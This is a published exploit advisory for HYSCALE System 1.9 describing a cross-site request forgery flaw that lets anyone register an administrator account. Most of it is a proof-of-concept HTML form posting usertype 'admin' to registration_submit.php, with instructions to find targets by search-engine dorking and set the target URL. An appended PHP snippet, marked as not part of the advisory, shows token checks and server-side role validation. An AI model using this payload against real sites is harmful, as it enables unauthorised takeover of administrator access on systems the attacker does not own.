HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

Packet Storm

=============================================================================================================================================
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] This HTML page is designed to remotely add a new admin.

[+] Line 10 : Set your target URL

[+] Save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

<label for="username">Username:</label>
<input type="text" name="username" id="username" required><br><br>

<label for="email">Email:</label>  
<input type="email" name="email" id="email" required><br><br>

<label for="password">Password:</label>  
<input type="password" name="password" id="password" required><br><br>

<label for="dob">Date of Birth:</label>  
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

<label>Gender:</label><br>  
<input type="radio" name="gender" value="Male" id="male" required>  
<label for="male">Male</label><br>  
<input type="radio" name="gender" value="Female" id="female">  
<label for="female">Female</label><br><br>

<label for="usertype">User Type:</label>  
<select name="usertype" id="usertype" required>  
    <option value="admin">Admin</option>  
    <option value="user">User</option>  
    <option value="guest">Guest</option>  
</select><br><br>

<label for="target_sales">Target Sales:</label>  
<input type="text" name="target_sales" id="target_sales" required><br><br>

<input type="submit" value="Submit">

</form>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
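
The PoC form above carries no anti-CSRF token and lets the submitter choose usertype, so the fix belongs in the server-side handler. The sketch below is an added example, not code from the advisory or from HYSCALE; the csrf_token field, the $_SESSION['role'] key and the function names are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical hardened handler for the PoC's POST fields; not HYSCALE's code.
// Assumed names: csrf_token (hidden field / session key), $_SESSION['role'].

session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Per-session token the legitimate form embeds in a hidden csrf_token field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time check; a cross-site form cannot read the token, so it fails here.
function csrf_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== ''
        && hash_equals($expected, $submitted);
}

// The role is decided server-side: only an admin session may grant "admin".
function resolve_usertype($requested, $sessionRole): ?string
{
    if (!in_array($requested, ['admin', 'user', 'guest'], true)) {
        return null;                       // unknown or missing role
    }
    if ($requested === 'admin' && $sessionRole !== 'admin') {
        return null;                       // privilege escalation attempt
    }
    return $requested;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $role = resolve_usertype($_POST['usertype'] ?? null, $_SESSION['role'] ?? null);
    if (!csrf_valid($_POST['csrf_token'] ?? null) || $role === null) {
        http_response_code(403);
        exit('Request rejected');
    }
    // Hash the password; store it and $role with a prepared statement.
    $hash = password_hash((string) ($_POST['password'] ?? ''), PASSWORD_DEFAULT);
}
```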
